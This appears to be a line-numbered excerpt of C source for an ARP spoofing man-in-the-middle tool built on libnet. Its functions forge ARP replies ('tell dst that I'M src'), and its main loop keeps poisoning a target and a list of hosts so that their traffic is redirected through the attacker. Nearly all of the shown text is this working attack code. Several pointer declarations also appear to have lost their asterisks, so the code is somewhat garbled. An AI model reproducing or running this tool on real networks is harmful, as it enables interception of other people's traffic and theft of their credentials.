	469	if (srdnfo->ip_blklen > 100) /* range is 100^2 in size */
	470	srdnfo->ip_blklen = 257 + srdnfo->ip_blklen * 0.2;
	471
	472	srdnfo->ip_offset = 0;
	473
	474	return (0);
	475	}
	476
	477	void parse_mac(char mac_string, unsigned char mac)
	478	{
	479	unsigned int tmp[6];
	480	int i;
	481
	482	sscanf(mac_string, "%2x:%2x:%2x:%2x:%2x:%2x",
	483	&tmp[0], &tmp[1], &tmp[2], &tmp[3], &tmp[4], &tmp[5]);
	484
	485	for(i = 0;i < 6;i++) mac[i] = tmp[i];
	486	}
	487
	488
	489	/*
	490	* tell 'dst' that I'M src
	491	* return 0 on success
	492	*/
	493	int
	494	do_arpmim(char mymac, struct _ipmac src, struct _ipmac *dst)
	495	{
	496	libnet_build_ethernet(dst->mac,
	497	mymac,
	498	ETHERTYPE_ARP, NULL, 0, pkt);
	499
	500	libnet_build_arp(ARPHRD_ETHER, ETHERTYPE_IP,
	501	6, 4, opt.arpop,
	502	mymac,
	503	(unsigned char *)&src->ip,
	504	dst->mac,
	505	(unsigned char *)&dst->ip,
	506	NULL, 0, pkt + LIBNET_ETH_H);
	507
	508	libnet_write_link_layer(opt.link, opt.ldev, pkt,
	509	LIBNET_ETH_H + LIBNET_ARP_H);
	510	return (0);
	511
	512	}
	513	void
	514	print_amitm(struct _ipmac ipmac0, struct _ipmac ipmac)
	515	{
	516	if (opt.verb)
	517	{
	518	printf("Hi %s:%s, ", int_ntoa(ipmac->ip),
	519	mac2str(ipmac->mac));
	520	printf("%s is at %s\n", int_ntoa(ipmac0->ip),
	521	mac2str(opt.mymac));
	522	}
	523	}
	524
	525	int
	526	main(int argc, char *argv[])
	527	{
	528	char error_buf[MAXBUFSIZE + 1];
	529	int i;
	530	unsigned short c = 0;
	531	struct _ipmac ipmac;
	532
	533	init_vars();
	534	do_opt(argc, argv);
	535	if (opt.initipmac == NULL)
	536	usage(0, "not enough parameters");
	537
	538	banner();
	539
	540	if(libnet_init_packet(LIBNET_ETH_H + LIBNET_ARP_H, &pkt) == -1)
	541	die(EXIT_FAILURE, "libnet_init_packet failed.");
	542
	543	if((opt.link = libnet_open_link_interface(opt.ldev, error_buf)) == NULL)
	544	die(EXIT_FAILURE, "libnet_open_link_interface failed: %s.",
	545	error_buf);
	546
	547	signal(SIGINT, cleanup);
	548	signal(SIGKILL, cleanup);
	549
	550	c = 0;
	551	i = 0;
	552	while (1)
	553	{
	554
	555	if (opt.getnextipmac(&ipmac) == -1)
	556	{
	557	if (opt.resetipmac(NULL) != 0)
	558	die(EXIT_FAILURE, "unable to reset ipmac list");
	559
	560	opt.getnextipmac(&ipmac);
	561	}
	562
	563	if (!(opt.flags & OPT_REVASYM))
	564	{
	565	if (opt.verb)
	566	print_amitm(&opt.trgt, &ipmac);
	567	do_arpmim(opt.mymac, &opt.trgt, &ipmac);
	568	}
	569
	570	if (!(opt.flags & OPT_ASYM))
	571	{
	572	usleep(3000); /* 0.03 seconds */
	573	if (opt.verb)
	574	print_amitm(&ipmac, &opt.trgt);
	575	do_arpmim(opt.mymac, &ipmac, &opt.trgt);
	576	}
	577
	578	usleep(opt.pwait * 1000);
	579	}
	580
	581	exit (EXIT_SUCCESS);
	582	return (EXIT_SUCCESS);
	583	}
	584